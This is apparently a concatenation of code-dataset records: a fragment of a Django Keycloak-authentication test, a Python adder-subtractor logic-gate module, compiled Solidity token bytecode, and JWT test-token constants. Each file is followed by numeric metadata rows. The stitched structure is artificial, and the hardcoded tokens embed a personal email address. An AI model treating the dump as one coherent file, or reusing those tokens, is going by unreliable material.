            user = user_objects.get(username='testing__user')
            self.assertEqual(user.first_name, 'John')
            self.assertEqual(user.last_name, 'Doe')
            self.assertEqual(user.email, 'john.doe@example.com')
            mock_req_2.assert_called_once_with(
                method='get',
                url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/userinfo',
                headers={'Authorization': f'Bearer {FAKE_TOKEN}'},
            )
            session = self.client.session
            self.assertTrue(session.get(settings.GATEWAY_HEADER_TOKEN),
                            'flagged as gateway authenticated')
            self.assertEqual(session.get(settings.REALM_COOKIE), REALM)

        # visit same page with a valid token again
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request',
                        side_effect=[
                            # get userinfo from keycloak
                            MockResponse(status_code=200, json_data={
                                'preferred_username': 'user',
                                'given_name': 'John',
                                'family_name': 'Smith',
                                'email': 'john.smith@example.com',
                            }),
                        ]) as mock_req_3:
            self.assertEqual(user_objects.filter(username='testing__user').count(), 1)
            response = self.client.get(SAMPLE_URL, **{HTTP_HEADER: FAKE_TOKEN})
            self.assertEqual(response.status_code, 200)
            # the existing user is updated, not duplicated
            self.assertEqual(user_objects.filter(username='testing__user').count(), 1)
            user = user_objects.get(username='testing__user')
            self.assertEqual(user.first_name, 'John')
            self.assertEqual(user.last_name, 'Smith')
            self.assertEqual(user.email, 'john.smith@example.com')
            mock_req_3.assert_called_once_with(
                method='get',
                url=f'{settings.KEYCLOAK_SERVER_URL}/{REALM}/protocol/openid-connect/userinfo',
                headers={'Authorization': f'Bearer {FAKE_TOKEN}'},
            )

        # visit any page without a valid token
        response = self.client.get(SAMPLE_URL)
        self.assertEqual(response.status_code, 403)
        # the user is logged out
        session = self.client.session
        self.assertIsNone(session.get(settings.GATEWAY_HEADER_TOKEN))
        self.assertIsNone(session.get(settings.REALM_COOKIE))

        # visit a non gateway page with the token
        with mock.patch('aether.sdk.auth.keycloak.utils.exec_request') as mock_req_4:
            response = self.client.get(reverse('testmodel-list'), **{HTTP_HEADER: FAKE_TOKEN})
            self.assertEqual(response.status_code, 403)
            # non-gateway URLs never trigger a keycloak call
            mock_req_4.assert_not_called()
| 43.238267
| 99
| 0.544627
| 3,546
| 35,931
| 5.321207
| 0.084602
| 0.050877
| 0.038476
| 0.036568
| 0.890773
| 0.870687
| 0.859611
| 0.849118
| 0.832371
| 0.826064
| 0
| 0.01059
| 0.356127
| 35,931
| 830
| 100
| 43.290361
| 0.805014
| 0.087891
| 0
| 0.827362
| 0
| 0
| 0.19618
| 0.104686
| 0
| 0
| 0
| 0
| 0.20684
| 1
| 0.009772
| false
| 0.021173
| 0.027687
| 0
| 0.042345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
143afa2a3ac5466b576ac87ae8b831db9911e23c
| 13,495
|
py
|
Python
|
bitwise/arithmetic/ADD_SUB.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
bitwise/arithmetic/ADD_SUB.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
bitwise/arithmetic/ADD_SUB.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
"""
The following classes are defined:
AdderSubtractor4
AdderSubtractor8
AdderSubtractor16
"""
from .. import wire
from .. import gate
from .. import signal
from . import ADD
Wire = wire.Wire
Bus4 = wire.Bus4
Bus8 = wire.Bus8
Bus16 = wire.Bus16
class AdderSubtractor4:
    """Construct a new 4-bit adder-subtractor.

    Args:
        add_subtract: An object of type Wire. Indicates the operation to carry
            out - 0 for addition, 1 for subtraction.
        a_bus: An object of type Bus4. The first addend, or the minuend.
            a_bus[0] and a_bus[3] are the most and least significant bit,
            respectively. a_bus[0] is the sign bit in subtraction operations.
        b_bus: An object of type Bus4. The second addend, or the subtrahend.
            b_bus[0] and b_bus[3] are the most and least significant bit,
            respectively. b_bus[0] is the sign bit in subtraction operations.
        overflow: An object of type Wire. The overflow indicator of the
            subtractor.
        carry_out: An object of type Wire. The carry-out of the adder.
        sum_bus: An object of type Bus4. The sum of the two addends, or the
            difference between the minuend and the subtrahend. sum_bus[0] and
            sum_bus[3] are the most and least significant bit, respectively.
            sum_bus[0] is the sign bit in subtraction operations.

    Raises:
        TypeError: If either a_bus, b_bus, or sum_bus is not a bus of width 4.
    """
    def __init__(
        self,
        add_subtract,
        a_bus,
        b_bus,
        overflow,
        carry_out,
        sum_bus
    ):
        # validate all three buses with one loop instead of three copies
        # of the same check (checked in the same order: a, b, sum)
        for bus in (a_bus, b_bus, sum_bus):
            if len(bus.wires) != 4:
                raise TypeError(
                    "Expected bus of width 4, received bus of width {0}.".format(
                        len(bus.wires)
                    )
                )

        # internal bus carrying b_bus, inverted when subtracting
        bus_1 = Bus4(*(Wire() for _ in range(4)))
        not_input_1 = Wire()
        not_input_2 = Wire()
        not_output = Wire()
        and_1_wire = Wire()
        and_2_wire = Wire()

        input_1 = a_bus.wires
        input_2 = b_bus.wires
        output = sum_bus.wires

        # invert b_bus when subtracting; add_subtract doubles as carry-in
        # to complete the two's complement negation
        signal.ControlledInverter4(add_subtract, b_bus, bus_1)
        ADD.Adder4(add_subtract, a_bus, bus_1, carry_out, sum_bus)

        # signed overflow: sign bits of the operands agree but differ from
        # the sign bit of the result
        gate.NOTGate(input_1[0], not_input_1)
        gate.NOTGate(input_2[0], not_input_2)
        gate.NOTGate(output[0], not_output)
        gate.ANDGate3(input_1[0], not_input_2, not_output, and_1_wire)
        gate.ANDGate3(not_input_1, input_2[0], output[0], and_2_wire)
        gate.ORGate2(and_1_wire, and_2_wire, overflow)

        self.add_subtract = add_subtract
        self.a_bus = a_bus
        self.b_bus = b_bus
        self.overflow = overflow
        self.carry_out = carry_out
        self.sum_bus = sum_bus

    def __str__(self):
        """Return a human-readable dump of all wire/bus values."""
        return "\n".join((
            f"add_subtract: {self.add_subtract.value}",
            f"a_bus: {self.a_bus}",
            f"b_bus: {self.b_bus}",
            f"overflow: {self.overflow.value}",
            f"carry_out: {self.carry_out.value}",
            f"sum_bus: {self.sum_bus}",
        ))

    def __call__(
        self, *,
        add_subtract=None,
        a_bus=None,
        b_bus=None,
        overflow=None,
        carry_out=None,
        sum_bus=None
    ):
        """Assign new values to any subset of the component's wires/buses."""
        if add_subtract is not None:
            self.add_subtract.value = add_subtract
        if a_bus is not None:
            self.a_bus.wire_values = a_bus
        if b_bus is not None:
            self.b_bus.wire_values = b_bus
        if overflow is not None:
            self.overflow.value = overflow
        if carry_out is not None:
            self.carry_out.value = carry_out
        if sum_bus is not None:
            self.sum_bus.wire_values = sum_bus
class AdderSubtractor8:
    """Construct a new 8-bit adder-subtractor.

    Args:
        add_subtract: An object of type Wire. Indicates the operation to carry
            out - 0 for addition, 1 for subtraction.
        a_bus: An object of type Bus8. The first addend, or the minuend.
            a_bus[0] and a_bus[7] are the most and least significant bit,
            respectively. a_bus[0] is the sign bit in subtraction operations.
        b_bus: An object of type Bus8. The second addend, or the subtrahend.
            b_bus[0] and b_bus[7] are the most and least significant bit,
            respectively. b_bus[0] is the sign bit in subtraction operations.
        overflow: An object of type Wire. The overflow indicator of the
            subtractor.
        carry_out: An object of type Wire. The carry-out of the adder.
        sum_bus: An object of type Bus8. The sum of the two addends, or the
            difference between the minuend and the subtrahend. sum_bus[0] and
            sum_bus[7] are the most and least significant bit, respectively.
            sum_bus[0] is the sign bit in subtraction operations.

    Raises:
        TypeError: If either a_bus, b_bus, or sum_bus is not a bus of width 8.
    """
    def __init__(
        self,
        add_subtract,
        a_bus,
        b_bus,
        overflow,
        carry_out,
        sum_bus
    ):
        # validate all three buses with one loop instead of three copies
        # of the same check (checked in the same order: a, b, sum)
        for bus in (a_bus, b_bus, sum_bus):
            if len(bus.wires) != 8:
                raise TypeError(
                    "Expected bus of width 8, received bus of width {0}.".format(
                        len(bus.wires)
                    )
                )

        # internal bus carrying b_bus, inverted when subtracting
        bus_1 = Bus8(*(Wire() for _ in range(8)))
        not_input_1 = Wire()
        not_input_2 = Wire()
        not_output = Wire()
        and_1_wire = Wire()
        and_2_wire = Wire()

        input_1 = a_bus.wires
        input_2 = b_bus.wires
        output = sum_bus.wires

        # invert b_bus when subtracting; add_subtract doubles as carry-in
        # to complete the two's complement negation
        signal.ControlledInverter8(add_subtract, b_bus, bus_1)
        ADD.Adder8(add_subtract, a_bus, bus_1, carry_out, sum_bus)

        # signed overflow: sign bits of the operands agree but differ from
        # the sign bit of the result
        gate.NOTGate(input_1[0], not_input_1)
        gate.NOTGate(input_2[0], not_input_2)
        gate.NOTGate(output[0], not_output)
        gate.ANDGate3(input_1[0], not_input_2, not_output, and_1_wire)
        gate.ANDGate3(not_input_1, input_2[0], output[0], and_2_wire)
        gate.ORGate2(and_1_wire, and_2_wire, overflow)

        self.add_subtract = add_subtract
        self.a_bus = a_bus
        self.b_bus = b_bus
        self.overflow = overflow
        self.carry_out = carry_out
        self.sum_bus = sum_bus

    def __str__(self):
        """Return a human-readable dump of all wire/bus values."""
        return "\n".join((
            f"add_subtract: {self.add_subtract.value}",
            f"a_bus: {self.a_bus}",
            f"b_bus: {self.b_bus}",
            f"overflow: {self.overflow.value}",
            f"carry_out: {self.carry_out.value}",
            f"sum_bus: {self.sum_bus}",
        ))

    def __call__(
        self, *,
        add_subtract=None,
        a_bus=None,
        b_bus=None,
        overflow=None,
        carry_out=None,
        sum_bus=None
    ):
        """Assign new values to any subset of the component's wires/buses."""
        if add_subtract is not None:
            self.add_subtract.value = add_subtract
        if a_bus is not None:
            self.a_bus.wire_values = a_bus
        if b_bus is not None:
            self.b_bus.wire_values = b_bus
        if overflow is not None:
            self.overflow.value = overflow
        if carry_out is not None:
            self.carry_out.value = carry_out
        if sum_bus is not None:
            self.sum_bus.wire_values = sum_bus
class AdderSubtractor16:
    """Construct a new 16-bit adder-subtractor.

    Args:
        add_subtract: An object of type Wire. Indicates the operation to carry
            out - 0 for addition, 1 for subtraction.
        a_bus: An object of type Bus16. The first addend, or the minuend.
            a_bus[0] and a_bus[15] are the most and least significant bit,
            respectively. a_bus[0] is the sign bit in subtraction operations.
        b_bus: An object of type Bus16. The second addend, or the subtrahend.
            b_bus[0] and b_bus[15] are the most and least significant bit,
            respectively. b_bus[0] is the sign bit in subtraction operations.
        overflow: An object of type Wire. The overflow indicator of the
            subtractor.
        carry_out: An object of type Wire. The carry-out of the adder.
        sum_bus: An object of type Bus16. The sum of the two addends, or the
            difference between the minuend and the subtrahend. sum_bus[0] and
            sum_bus[15] are the most and least significant bit, respectively.
            sum_bus[0] is the sign bit in subtraction operations.

    Raises:
        TypeError: If either a_bus, b_bus, or sum_bus is not a bus of width 16.
    """
    def __init__(
        self,
        add_subtract,
        a_bus,
        b_bus,
        overflow,
        carry_out,
        sum_bus
    ):
        # validate all three buses with one loop instead of three copies
        # of the same check (checked in the same order: a, b, sum)
        for bus in (a_bus, b_bus, sum_bus):
            if len(bus.wires) != 16:
                raise TypeError(
                    "Expected bus of width 16, received bus of width {0}.".format(
                        len(bus.wires)
                    )
                )

        # internal bus carrying b_bus, inverted when subtracting
        bus_1 = Bus16(*(Wire() for _ in range(16)))
        not_input_1 = Wire()
        not_input_2 = Wire()
        not_output = Wire()
        and_1_wire = Wire()
        and_2_wire = Wire()

        input_1 = a_bus.wires
        input_2 = b_bus.wires
        output = sum_bus.wires

        # invert b_bus when subtracting; add_subtract doubles as carry-in
        # to complete the two's complement negation
        signal.ControlledInverter16(add_subtract, b_bus, bus_1)
        ADD.Adder16(add_subtract, a_bus, bus_1, carry_out, sum_bus)

        # signed overflow: sign bits of the operands agree but differ from
        # the sign bit of the result
        gate.NOTGate(input_1[0], not_input_1)
        gate.NOTGate(input_2[0], not_input_2)
        gate.NOTGate(output[0], not_output)
        gate.ANDGate3(input_1[0], not_input_2, not_output, and_1_wire)
        gate.ANDGate3(not_input_1, input_2[0], output[0], and_2_wire)
        gate.ORGate2(and_1_wire, and_2_wire, overflow)

        self.add_subtract = add_subtract
        self.a_bus = a_bus
        self.b_bus = b_bus
        self.overflow = overflow
        self.carry_out = carry_out
        self.sum_bus = sum_bus

    def __str__(self):
        """Return a human-readable dump of all wire/bus values."""
        return "\n".join((
            f"add_subtract: {self.add_subtract.value}",
            f"a_bus: {self.a_bus}",
            f"b_bus: {self.b_bus}",
            f"overflow: {self.overflow.value}",
            f"carry_out: {self.carry_out.value}",
            f"sum_bus: {self.sum_bus}",
        ))

    def __call__(
        self, *,
        add_subtract=None,
        a_bus=None,
        b_bus=None,
        overflow=None,
        carry_out=None,
        sum_bus=None
    ):
        """Assign new values to any subset of the component's wires/buses."""
        if add_subtract is not None:
            self.add_subtract.value = add_subtract
        if a_bus is not None:
            self.a_bus.wire_values = a_bus
        if b_bus is not None:
            self.b_bus.wire_values = b_bus
        if overflow is not None:
            self.overflow.value = overflow
        if carry_out is not None:
            self.carry_out.value = carry_out
        if sum_bus is not None:
            self.sum_bus.wire_values = sum_bus
| 32.914634
| 79
| 0.558133
| 1,867
| 13,495
| 3.76647
| 0.059989
| 0.032423
| 0.029863
| 0.035836
| 0.929181
| 0.929181
| 0.929181
| 0.914249
| 0.911405
| 0.911405
| 0
| 0.03177
| 0.353909
| 13,495
| 409
| 80
| 32.99511
| 0.774745
| 0.257058
| 0
| 0.780328
| 0
| 0
| 0.068154
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029508
| false
| 0
| 0.013115
| 0
| 0.062295
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
145d3ea9060b7295f0b7e5b21153fbe39e93cf1f
| 12,213
|
py
|
Python
|
tradingdb/relationaldb/tests/utils.py
|
gnosis/gnosisdb
|
b3055406fba7061c3677bfd16e19f8bc5c97db2c
|
[
"MIT"
] | 11
|
2017-06-23T15:35:10.000Z
|
2018-04-27T06:11:25.000Z
|
tradingdb/relationaldb/tests/utils.py
|
gnosis/gnosisdb
|
b3055406fba7061c3677bfd16e19f8bc5c97db2c
|
[
"MIT"
] | 42
|
2018-01-17T15:46:33.000Z
|
2018-05-08T08:13:17.000Z
|
tradingdb/relationaldb/tests/utils.py
|
gnosis/gnosisdb
|
b3055406fba7061c3677bfd16e19f8bc5c97db2c
|
[
"MIT"
] | 12
|
2017-07-03T15:51:41.000Z
|
2018-03-25T17:31:54.000Z
|
tournament_token_bytecode = "0x608060405233600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550611776806100546000396000f3006080604052600436106100fc576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806302d05d3f1461010157806306fdde0314610158578063095ea7b3146101e8578063136ef18a1461024d57806318160ddd146102b357806323b872dd146102de578063313ce567146103635780633d0950a81461039457806342958b54146103fa578063429b62e51461046a5780636105c94b146104c557806370a08231146104f457806395d89b411461054b5780639b19251a146105db578063a9059cbb14610636578063ae876f611461069b578063bbc8e3cb14610701578063dd62ed3e14610767575b600080fd5b34801561010d57600080fd5b506101166107de565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561016457600080fd5b5061016d610804565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156101ad578082015181840152602081019050610192565b50505050905090810190601f1680156101da5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156101f457600080fd5b50610233600480360381019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291908035906020019092919050505061083d565b604051808215151515815260200191505060405180910390f35b34801561025957600080fd5b506102b16004803603810190808035906020019082018035906020019080806020026020016040519081016040528093929190818152602001838360200280828437820191505050505050919291929050505061092f565b005b3480156102bf57600080fd5b506102c8610a76565b6040518082815260200191505060405180910390f35b3480156102ea57600080fd5b50610349600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610a80565b604051808215151515815260200191505060405180910390f35b34801561036f57600080fd5b50610378610b42565b604051808260ff1660ff168
15260200191505060405180910390f35b3480156103a057600080fd5b506103f860048036038101908080359060200190820180359060200190808060200260200160405190810160405280939291908181526020018383602002808284378201915050505050509192919290505050610b47565b005b34801561040657600080fd5b506104686004803603810190808035906020019082018035906020019080806020026020016040519081016040528093929190818152602001838360200280828437820191505050505050919291929080359060200190929190505050610c33565b005b34801561047657600080fd5b506104ab600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610ddc565b604051808215151515815260200191505060405180910390f35b3480156104d157600080fd5b506104da610dfc565b604051808215151515815260200191505060405180910390f35b34801561050057600080fd5b50610535600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610e01565b6040518082815260200191505060405180910390f35b34801561055757600080fd5b50610560610e49565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156105a0578082015181840152602081019050610585565b50505050905090810190601f1680156105cd5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156105e757600080fd5b5061061c600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610e82565b604051808215151515815260200191505060405180910390f35b34801561064257600080fd5b50610681600480360381019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610ea2565b604051808215151515815260200191505060405180910390f35b3480156106a757600080fd5b506106ff60048036038101908080359060200190820180359060200190808060200260200160405190810160405280939291908181526020018383602002808284378201915050505050509192919290505050610f62565b005b34801561070d57600080fd5b506107656004803603810190808035906020019082018035906020019080806020026020016040519081016040528093929190818152602001838360200280828437820191505050505050919291929050505061104e565b005b348015610
77357600080fd5b506107c8600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611195565b6040518082815260200191505060405180910390f35b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6040805190810160405280600d81526020017f4f6c796d70696120546f6b656e0000000000000000000000000000000000000081525081565b600081600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040518082815260200191505060405180910390a36001905092915050565b6000600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614806109dd575060011515600560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161515145b15156109e857600080fd5b600090505b8151811015610a72576001600460008484815181101515610a0a57fe5b9060200190602002015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806001019150506109ed565b5050565b6000600254905090565b6000600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610b235750600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1515610b2e57600080fd5b610b3984848461121c565b90509392505050565b601281565b6000600360009054906101000
a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16141515610ba557600080fd5b600090505b8151811015610c2f576001600560008484815181101515610bc757fe5b9060200190602002015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080600101915050610baa565b5050565b600080600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16141515610c9257600080fd5b600091505b8351821015610da8578382815181101515610cae57fe5b906020019060200201519050610d0b836000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461150190919063ffffffff16565b6000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508073ffffffffffffffffffffffffffffffffffffffff167f9cb9c14f7bc76e3a89b796b091850526236115352a198b1e472f00e91376bbcb846040518082815260200191505060405180910390a28180600101925050610c97565b610dd0610dbf85518561152390919063ffffffff16565b60025461150190919063ffffffff16565b60028190555050505050565b60056020528060005260406000206000915054906101000a900460ff1681565b600181565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6040805190810160405280600381526020017f4f4c59000000000000000000000000000000000000000000000000000000000081525081565b60046020528060005260406000206000915054906101000a900460ff1681565b6000600460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610f455750600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906
101000a900460ff165b1515610f5057600080fd5b610f5a8383611545565b905092915050565b6000600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16141515610fc057600080fd5b600090505b815181101561104a576000600560008484815181101515610fe257fe5b9060200190602002015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080600101915050610fc5565b5050565b6000600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614806110fc575060011515600560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161515145b151561110757600080fd5b600090505b815181101561119157600060046000848481518110151561112957fe5b9060200190602002015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808060010191505061110c565b5050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600061126f826000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461170890919063ffffffff16565b1580611307575061130582600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461170890919063ffffffff16565b155b80611360575061135e826000808673fffffffffffffffffffffffffff
fffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461171690919063ffffffff16565b155b1561136e57600090506114fa565b816000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254039250508190555081600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540392505081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040518082815260200191505060405180910390a3600190505b9392505050565b600061150d8383611716565b151561151857600080fd5b818301905092915050565b600061152f8383611726565b151561153a57600080fd5b818302905092915050565b6000611598826000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461170890919063ffffffff16565b15806115f257506115f0826000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461171690919063ffffffff16565b155b156116005760009050611702565b816000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540392505081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040518082815260200191505060405180910390a3600190505b92915050565b6000818
31015905092915050565b6000828284011015905092915050565b6000808214806117425750828283850281151561173f57fe5b04145b9050929150505600a165627a7a723058205e5821735c824c73df5e6600554ce48b350410c6c3602c9b74f92af5b46eefdf0029"
| 6,106.5
| 12,212
| 0.999509
| 4
| 12,213
| 3,051.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.634971
| 0.000246
| 12,213
| 1
| 12,213
| 12,213
| 0.364619
| 0
| 0
| 0
| 0
| 0
| 0.997462
| 0.997462
| 0
| 1
| 0.997462
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
14a796965ec7f09f47a00c7f1ad7492a84deaf81
| 1,078
|
py
|
Python
|
carmesi/nucleo/tests/constant.py
|
RedGranatum/Carmesi
|
bde1d4dd104401ba08e7ba2f3de5b9d5f537dd94
|
[
"MIT"
] | null | null | null |
carmesi/nucleo/tests/constant.py
|
RedGranatum/Carmesi
|
bde1d4dd104401ba08e7ba2f3de5b9d5f537dd94
|
[
"MIT"
] | null | null | null |
carmesi/nucleo/tests/constant.py
|
RedGranatum/Carmesi
|
bde1d4dd104401ba08e7ba2f3de5b9d5f537dd94
|
[
"MIT"
] | null | null | null |
# Pre-generated JWT fixtures (header.payload.signature, HS256) used by the
# test suite. Payload contents below are decoded from the base64 segments.
# Email-confirmation token for a new client (exp 4733510400 -- far future,
# effectively non-expiring for tests).
TOKEN_PREALTA_CLIENTE = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6InJhdWx0ckBnbWFpbC5jb20iLCJleHAiOjQ3MzM1MTA0MDAsIm93bmVyX25hbWUiOiJSYXVsIEVucmlxdWUgVG9ycmVzIFJleWVzIiwidHlwZSI6ImVtYWlsX2NvbmZpcm1hdGlvbl9uZXdfY2xpZW50In0.R-nXh1nXvlBABfEdV1g81mdIzJqMFLvFV7FAP7PQRCM'
# Same token type but already expired ("caduco"; exp 1586578850 is in the
# past) -- used to exercise the expired-token path.
TOKEN_PREALTA_CLIENTE_CADUCO = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibGF0aWVuZGl0YTJAZ2FtaWwuY29tIiwib3duZXJfbmFtZSI6IkFuZ2VsIEdhcmNpYSIsImV4cCI6MTU4NjU3ODg1MCwidHlwZSI6ImVtYWlsX2NvbmZpcm1hdGlvbl9uZXdfY2xpZW50In0.x66iQug11cjmkUHqmZq68gdbN3ffSVyD9MHagrspKRw'
# Email-confirmation token for a new user (includes schema_name).
TOKEN_PREALTA_USUARIO = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6InJhdWx0ckBnbWFpbC5jb20iLCJleHAiOjQ3MzM1MTA0MDAsIm5hbWUiOiJSYXVsIEVucmlxdWUgVG9ycmVzIFJleWVzIiwic2NoZW1hX25hbWUiOiJtaXRpZW5kaXRhIiwidHlwZSI6ImVtYWlsX2NvbmZpcm1hdGlvbl9uZXdfdXNlciJ9.gcagbNxnNxIkgZbP0mu-9MudiFb9b6cKvttPF4EHH5E'
# Login token for an existing user.
TOKEN_USUARIO_LOGIN = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6InJhdWx0ckBnbWFpbC5jb20iLCJleHAiOjQ3MzM1MTA0MDAsInNjaGVtYV9uYW1lIjoibWl0aWVuZGl0YSIsInR5cGUiOiJ1c2VyX2xvZ2luIn0.vCdeH0iP94XBucXYtWZvEQq7CuEr-P80SdfIjN673qI'
| 119.777778
| 299
| 0.963822
| 28
| 1,078
| 36.785714
| 0.642857
| 0.034951
| 0.036893
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119586
| 0.014842
| 1,078
| 8
| 300
| 134.75
| 0.850282
| 0
| 0
| 0
| 0
| 0
| 0.892293
| 0.892293
| 0
| 1
| 0
